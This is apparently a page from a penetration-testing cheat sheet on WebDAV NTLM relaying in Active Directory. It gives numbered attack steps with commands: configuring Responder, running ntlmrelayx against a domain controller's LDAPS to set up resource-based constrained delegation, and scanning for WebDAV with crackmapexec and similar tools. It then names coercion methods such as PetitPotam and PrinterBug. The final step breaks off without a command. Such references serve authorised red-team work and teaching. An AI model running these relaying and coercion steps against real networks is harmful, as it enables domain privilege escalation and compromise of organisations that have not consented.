WebDav Relaying
Example of exploitation where you can coerce machine accounts to authenticate to a host and combine it with Resource Based Constrained Delegation to gain elevated access. It allows attackers to elicit authentications made over HTTP instead of SMB
Requirements
1) WebClient service
Exploitation
1) Disable HTTP in Responder: sudo vi /usr/share/responder/Responder.conf
2) Generate a Windows machine name: sudo responder -I eth0 , e.g: WIN-UBNW4FI3AP0
3) Prepare for RBCD against the DC:
python3 ntlmrelayx.py -t ldaps://dc --delegateaccess -smb2support4) Discover WebDAV services
webclientservicescanner 'domain.local'/'user':'password'@'machine'
crackmapexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav
GetWebDAVStatus.exe 'machine'5) Trigger the authentication to relay to our ntlmrelayx:
the listener host must be specified with the FQDN or full netbios name like logger.domain.local@80/test.txt . Specifying the IP results in anonymous auth instead of System.
PrinterBug
PetitPotam
6) Use the created account to ask for a service ticket:
Last updated